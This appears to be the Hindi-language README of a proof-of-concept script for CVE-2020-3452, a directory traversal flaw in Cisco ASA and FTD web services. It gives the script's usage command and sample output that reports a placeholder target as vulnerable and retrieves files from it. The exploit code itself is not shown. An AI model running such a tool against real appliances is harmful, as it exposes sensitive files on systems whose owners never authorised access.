
CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) Software और Cisco Firepower Threat Defense (FTD) ट्रैवर्सल
उपयोग: CVE-2020-3452.py https://target
भेद्यता विवरण: Cisco Adaptive Security Appliance (ASA) Software और Cisco Firepower Threat Defense (FTD) Software के वेब सेवा इंटरफेस में एक भेद्यता एक अप्रमाणित, दूरस्थ हमलावर को निर्देशिका ट्रैवर्सल हमले करने और लक्षित सिस्टम पर संवेदनशील फ़ाइलें पढ़ने की अनुमति दे सकती है।
नमूना आउटपुट:
➜ Cisco-ASA-FTD-Web-Services-Traversal git:(main) ✗ python CVE-2020-3452.py https://target
+-------------------------------------------------------------+
- [ Cisco ASA / FTD Web Services Traversal Vulnerability ]
- -[ CVE-2020-3452 - PoC by: LiquidSky ^_^ ]-
+-------------------------------------------------------------+
[*] Checking potential target : https://target
[+] https://target is vulnerable...
[+] Grabbing logo.gif from the host.
[+] https://target is vulnerable...
[+] Grabbing http_auth.html from the host.
[+] https://target is vulnerable...